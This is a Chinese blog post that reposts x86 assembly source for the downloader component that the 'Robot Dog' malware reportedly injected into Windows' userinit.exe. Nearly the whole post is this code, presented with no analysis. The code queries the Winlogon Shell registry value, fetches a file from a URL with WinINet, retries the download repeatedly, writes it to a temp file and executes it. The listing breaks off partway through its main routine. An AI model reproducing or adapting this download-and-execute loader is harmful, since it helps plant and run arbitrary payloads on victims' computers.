机器狗写入到userinit.exe文件的下载者源码

现在的位置: 首页 > 综合 > 正文

RSS

机器狗写入到userinit.exe文件的下载者源码

2013年08月30日 ⁄ 综合 ⁄ 共 6092字 ⁄ 字号小中大 ⁄ 评论关闭

;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 机器狗写入到userinit.exe文件的恶意代码
; by naitm(http://hi.baidu.com/naitm)
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.386
.model flat,stdcall
option casemap:none
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; Include 文件定义
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
include windows.inc
include user32.inc
includelib user32.lib
include kernel32.inc
includelib kernel32.lib
include Advapi32.inc
includelib Advapi32.lib
include wininet.inc
includelib wininet.lib
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 数据段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.data
nThreadCount dd 0
g_ThreadCount dd 0
PathName db '.',0
szAgent db 'Shell',0
szUser32Dll db 'user32.dll',0
szLoadRemoteFonts db 'LoadRemoteFonts',0
szSubKey db 'SOFTWARE/Microsoft/Windows NT/CurrentVersion/Winlogon',0
szUrlList db 'http://127.0.0.1/cert.cer',0
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
; 代码段
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
.code
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_RunIt proc @lpExePath
local @ProcessInformation:PROCESS_INFORMATION
local @StartupInfo:STARTUPINFO
invoke GetStartupInfo,addr @StartupInfo
invoke CreateProcess,0,@lpExePath,0,0,0,20h,0,0,addr @StartupInfo,addr @ProcessInformation
.if eax == 0
invoke CloseHandle,@ProcessInformation.hThread
invoke CloseHandle,@ProcessInformation.hProcess
.endif
leave
retn 4
_RunIt endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DownloadFile proc @lpURL,@lpSaveFile,@Buffer
local @hInternet,@hInternetFile,@hLocalFile,@nNumberOfBytesToWrite,@NumberOfBytesWritten,@nWriteCount
local @lpbuffer[200h]:BYTE
xor eax, eax
mov @nWriteCount, eax
invoke InternetOpen,addr szAgent,0,0,0,0
.if eax != 0
mov @hInternet, eax
invoke InternetSetOption,@hInternet,2,@Buffer,4
invoke InternetSetOption,@hInternet,6,@Buffer,4
invoke InternetOpenUrl,@hInternet,@lpURL,0,0,200000h,0
.if eax != 0
mov @hInternetFile, eax
mov @nNumberOfBytesToWrite, 0
mov @NumberOfBytesWritten, 200h
invoke HttpQueryInfo,@hInternetFile,13h,addr @lpbuffer,/
addr @NumberOfBytesWritten,addr @nNumberOfBytesToWrite
.if eax != 0
invoke CreateFile,@lpSaveFile,40000000h,0,0,4,0,0
.if eax != 0FFFFFFFFh
mov @hLocalFile, eax
.while TRUE
mov @nNumberOfBytesToWrite, 0
invoke InternetReadFile,@hInternetFile,addr @lpbuffer,200h,addr @nNumberOfBytesToWrite
.break .if (!eax)
.break .if (@nNumberOfBytesToWrite==0)
inc @nWriteCount
invoke WriteFile,@hLocalFile,addr @lpbuffer,@nNumberOfBytesToWrite,/
addr @NumberOfBytesWritten,0
.endw
invoke SetEndOfFile,@hLocalFile
invoke CloseHandle,@hLocalFile
.endif
.endif
invoke InternetCloseHandle,@hInternetFile
.endif
invoke InternetCloseHandle,@hInternet
.endif
mov eax, @nWriteCount
leave
retn 0Ch
_DownloadFile endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
_DownloadEXERunIt proc @lpURL
local @DownTimes
local @TempFileName[204h]:BYTE
local @TempFileName2[204h]:BYTE
local @szUrl[104h]:BYTE
mov @DownTimes, 3Ch
invoke lstrcpy,addr @szUrl,@lpURL
invoke RtlZeroMemory,addr @TempFileName,204
invoke GetTempFileName,offset PathName,0,0,addr @TempFileName
invoke lstrcpy,addr @TempFileName2,addr @TempFileName
DownloadNxTime:
invoke _DownloadFile,addr @szUrl,addr @TempFileName,1388h
or eax, eax
jz DownloadFailed
invoke lstrcpy,addr @TempFileName,addr @TempFileName2
invoke _RunIt,addr @TempFileName
jmp DownloadEnd
; ---------------------------------------------------------------------------
DownloadFailed:
invoke Sleep,3E8h
dec @DownTimes
jnz DownloadNxTime
DownloadEnd:
dec nThreadCount
leave
retn 4
_DownloadEXERunIt endp
;>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
start:
main proc
local hKey,hObject,hFile,lpBaseAddress,ThreadId
local szShellValue[104h]:BYTE
invoke LoadLibrary,offset szUser32Dll
or eax, eax
jz RegQueryShell
invoke GetProcAddress,eax,offset szLoadRemoteFonts
or eax, eax
jz RegQueryShell
call eax
RegQueryShell:
invoke RegOpenKeyEx,80000002h,offset szSubKey,0,20019h,addr hKey
or eax, eax
jnz TestInternet
mov ThreadId, 104h
invoke RtlZeroMemory,addr szShellValue,104h
invoke RegQueryValueEx,hKey,offset szAgent,0,0,addr szShellValue,addr ThreadId

【上篇】spoj 1436
【下篇】那些年，我熟知的影视明星（1）

作者: kimchi

该日志由 kimchi 于11年前发表在综合分类下，最后更新于 2013年08月30日.
转载请注明: 机器狗写入到userinit.exe文件的下载者源码 | 学步园 +复制链接

抱歉!评论已关闭.

返回首页

（其他合作也可洽谈）

必威体育

必威电竞

学步园

机器狗写入到userinit.exe文件的下载者源码

作者: kimchi

书签

最新文章New

本站推荐

返回首页